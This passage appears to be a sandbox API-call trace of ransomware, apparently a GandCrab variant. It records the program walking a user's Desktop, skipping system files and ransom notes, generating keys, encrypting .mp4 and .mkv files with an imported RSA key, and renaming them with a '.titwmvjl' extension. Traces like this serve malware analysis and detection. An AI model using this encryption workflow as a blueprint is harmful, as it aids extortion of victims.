[0088.849] FindClose (in: hFindFile=0x503578 | out: hFindFile=0x503578) returned 1 [0088.850] CloseHandle (hObject=0x2bc) returned 1 [0088.850] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0088.850] lstrcmpW (lpString1="q0Z1ufk8.mp4", lpString2=".") returned 1 [0088.850] lstrcmpW (lpString1="q0Z1ufk8.mp4", lpString2="..") returned 1 [0088.850] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\", lpString2="q0Z1ufk8.mp4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\q0Z1ufk8.mp4") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\q0Z1ufk8.mp4" [0088.850] lstrlenW (lpString=".titwmvjl") returned 9 [0088.850] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\q0Z1ufk8.mp4") returned 66 [0088.850] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.850] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\q0Z1ufk8.mp4.titwmvjl") returned 75 [0088.850] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\q0Z1ufk8.mp4") returned 66 [0088.850] lstrlenW (lpString=".mp4") returned 4 [0088.850] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.851] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp4 ") returned 5 [0088.851] lstrcmpiW (lpString1=".mp4", lpString2=".titwmvjl") returned -1 [0088.851] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.851] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\q0Z1ufk8.mp4") returned 66 [0088.851] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\q0Z1ufk8.mp4") returned 66 [0088.851] lstrcmpiW (lpString1="q0Z1ufk8.mp4", lpString2="desktop.ini") returned 1 [0088.851] lstrcmpiW (lpString1="q0Z1ufk8.mp4", lpString2="autorun.inf") returned 1 [0088.851] lstrcmpiW (lpString1="q0Z1ufk8.mp4", lpString2="ntuser.dat") returned 1 [0088.851] lstrcmpiW (lpString1="q0Z1ufk8.mp4", lpString2="iconcache.db") returned 1 [0088.851] lstrcmpiW (lpString1="q0Z1ufk8.mp4", lpString2="bootsect.bak") returned 1 [0088.851] lstrcmpiW (lpString1="q0Z1ufk8.mp4", lpString2="boot.ini") returned 1 [0088.851] lstrcmpiW (lpString1="q0Z1ufk8.mp4", lpString2="ntuser.dat.log") returned 1 [0088.851] lstrcmpiW (lpString1="q0Z1ufk8.mp4", lpString2="thumbs.db") returned -1 [0088.851] lstrcmpiW (lpString1="q0Z1ufk8.mp4", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.851] lstrcmpiW (lpString1="q0Z1ufk8.mp4", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.851] lstrcmpiW (lpString1="q0Z1ufk8.mp4", lpString2="KRAB-DECRYPT.html") returned 1 [0088.851] lstrcmpiW (lpString1="q0Z1ufk8.mp4", lpString2="CRAB-DECRYPT.html") returned 1 [0088.851] lstrcmpiW (lpString1="q0Z1ufk8.mp4", lpString2="KRAB-DECRYPT.txt") returned 1 [0088.851] lstrcmpiW (lpString1="q0Z1ufk8.mp4", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.851] lstrcmpiW (lpString1="q0Z1ufk8.mp4", lpString2="ntldr") returned 1 [0088.851] lstrcmpiW (lpString1="q0Z1ufk8.mp4", lpString2="NTDETECT.COM") returned 1 [0088.851] lstrcmpiW (lpString1="q0Z1ufk8.mp4", lpString2="Bootfont.bin") returned 1 [0088.851] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\q0Z1ufk8.mp4") returned 66 [0088.851] lstrlenW (lpString=".mp4") returned 4 [0088.851] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.851] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp4 ") returned 5 [0088.851] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.852] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.852] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\q0Z1ufk8.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\q0z1ufk8.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0088.852] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.852] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0088.853] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.853] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.853] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0088.854] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.854] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.854] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.854] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0088.854] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.855] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.855] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.855] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.855] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0088.856] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.856] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.856] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.856] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0088.857] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.857] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.857] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.857] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.857] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0088.858] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.858] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503578) returned 1 [0088.859] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.859] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0088.859] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.859] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0088.859] GetLastError () returned 0x0 [0088.859] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.859] CryptDestroyKey (hKey=0x503578) returned 1 [0088.859] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.859] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.860] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.860] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0088.861] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.861] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503738) returned 1 [0088.861] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.861] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0088.861] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.861] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0088.862] GetLastError () returned 0x0 [0088.862] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.862] CryptDestroyKey (hKey=0x503738) returned 1 [0088.862] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.862] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.862] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.862] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.862] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0x18956, lpOverlapped=0x0) returned 1 [0088.869] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffe76aa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.869] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x18956, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0x18956, lpOverlapped=0x0) returned 1 [0088.871] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.871] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0088.872] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.875] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.876] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.876] CloseHandle (hObject=0x2bc) returned 1 [0088.877] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\q0Z1ufk8.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\q0z1ufk8.mp4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\q0Z1ufk8.mp4.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\q0z1ufk8.mp4.titwmvjl"), dwFlags=0x1) returned 1 [0088.877] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.877] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0088.877] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0088.878] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0088.878] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\TITWMVJL-DECRYPT.txt" [0088.878] lstrlenW (lpString=".titwmvjl") returned 9 [0088.878] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\TITWMVJL-DECRYPT.txt") returned 74 [0088.878] VirtualAlloc (lpAddress=0x0, dwSize=0xd4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.878] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 83 [0088.878] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\TITWMVJL-DECRYPT.txt") returned 74 [0088.878] lstrlenW (lpString=".txt") returned 4 [0088.878] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.878] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0088.878] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0088.878] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.878] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\TITWMVJL-DECRYPT.txt") returned 74 [0088.878] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\TITWMVJL-DECRYPT.txt") returned 74 [0088.878] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0088.878] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0088.878] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0088.878] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0088.878] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0088.878] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0088.878] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0088.878] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0088.878] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.879] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 0 [0088.879] FindClose (in: hFindFile=0x503378 | out: hFindFile=0x503378) returned 1 [0088.879] CloseHandle (hObject=0x2b4) returned 1 [0088.879] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0088.879] lstrcmpW (lpString1="G9sQ-F5KGugZIDvv.mkv", lpString2=".") returned 1 [0088.879] lstrcmpW (lpString1="G9sQ-F5KGugZIDvv.mkv", lpString2="..") returned 1 [0088.879] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\", lpString2="G9sQ-F5KGugZIDvv.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\G9sQ-F5KGugZIDvv.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\G9sQ-F5KGugZIDvv.mkv" [0088.879] lstrlenW (lpString=".titwmvjl") returned 9 [0088.880] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\G9sQ-F5KGugZIDvv.mkv") returned 67 [0088.880] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.880] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\G9sQ-F5KGugZIDvv.mkv.titwmvjl") returned 76 [0088.880] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\G9sQ-F5KGugZIDvv.mkv") returned 67 [0088.880] lstrlenW (lpString=".mkv") returned 4 [0088.880] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.880] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mkv ") returned 5 [0088.880] lstrcmpiW (lpString1=".mkv", lpString2=".titwmvjl") returned -1 [0088.880] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.880] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\G9sQ-F5KGugZIDvv.mkv") returned 67 [0088.880] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\G9sQ-F5KGugZIDvv.mkv") returned 67 [0088.880] lstrcmpiW (lpString1="G9sQ-F5KGugZIDvv.mkv", lpString2="desktop.ini") returned 1 [0088.880] lstrcmpiW (lpString1="G9sQ-F5KGugZIDvv.mkv", lpString2="autorun.inf") returned 1 [0088.880] lstrcmpiW (lpString1="G9sQ-F5KGugZIDvv.mkv", lpString2="ntuser.dat") returned -1 [0088.880] lstrcmpiW (lpString1="G9sQ-F5KGugZIDvv.mkv", lpString2="iconcache.db") returned -1 [0088.880] lstrcmpiW (lpString1="G9sQ-F5KGugZIDvv.mkv", lpString2="bootsect.bak") returned 1 [0088.880] lstrcmpiW (lpString1="G9sQ-F5KGugZIDvv.mkv", lpString2="boot.ini") returned 1 [0088.880] lstrcmpiW (lpString1="G9sQ-F5KGugZIDvv.mkv", lpString2="ntuser.dat.log") returned -1 [0088.880] lstrcmpiW (lpString1="G9sQ-F5KGugZIDvv.mkv", lpString2="thumbs.db") returned -1 [0088.880] lstrcmpiW (lpString1="G9sQ-F5KGugZIDvv.mkv", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.880] lstrcmpiW (lpString1="G9sQ-F5KGugZIDvv.mkv", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.880] lstrcmpiW (lpString1="G9sQ-F5KGugZIDvv.mkv", lpString2="KRAB-DECRYPT.html") returned -1 [0088.880] lstrcmpiW (lpString1="G9sQ-F5KGugZIDvv.mkv", lpString2="CRAB-DECRYPT.html") returned 1 [0088.880] lstrcmpiW (lpString1="G9sQ-F5KGugZIDvv.mkv", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.880] lstrcmpiW (lpString1="G9sQ-F5KGugZIDvv.mkv", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.880] lstrcmpiW (lpString1="G9sQ-F5KGugZIDvv.mkv", lpString2="ntldr") returned -1 [0088.880] lstrcmpiW (lpString1="G9sQ-F5KGugZIDvv.mkv", lpString2="NTDETECT.COM") returned -1 [0088.881] lstrcmpiW (lpString1="G9sQ-F5KGugZIDvv.mkv", lpString2="Bootfont.bin") returned 1 [0088.881] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\G9sQ-F5KGugZIDvv.mkv") returned 67 [0088.881] lstrlenW (lpString=".mkv") returned 4 [0088.881] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.881] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mkv ") returned 5 [0088.881] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.881] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.881] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\G9sQ-F5KGugZIDvv.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\g9sq-f5kgugzidvv.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0088.881] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.882] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0088.882] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.882] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.882] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0088.883] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.884] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.884] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.884] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0088.884] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.884] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.884] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.884] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.884] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0088.885] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.886] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.886] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.886] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0088.886] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.886] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.886] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.886] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.886] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0088.887] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.888] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5038f8) returned 1 [0088.888] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.888] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0088.888] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.889] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0088.889] GetLastError () returned 0x0 [0088.889] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.889] CryptDestroyKey (hKey=0x5038f8) returned 1 [0088.889] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.889] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.889] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.889] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0088.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.891] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503338) returned 1 [0088.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.891] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0088.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.891] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0088.891] GetLastError () returned 0x0 [0088.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.892] CryptDestroyKey (hKey=0x503338) returned 1 [0088.892] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.892] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.892] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.892] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.892] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, 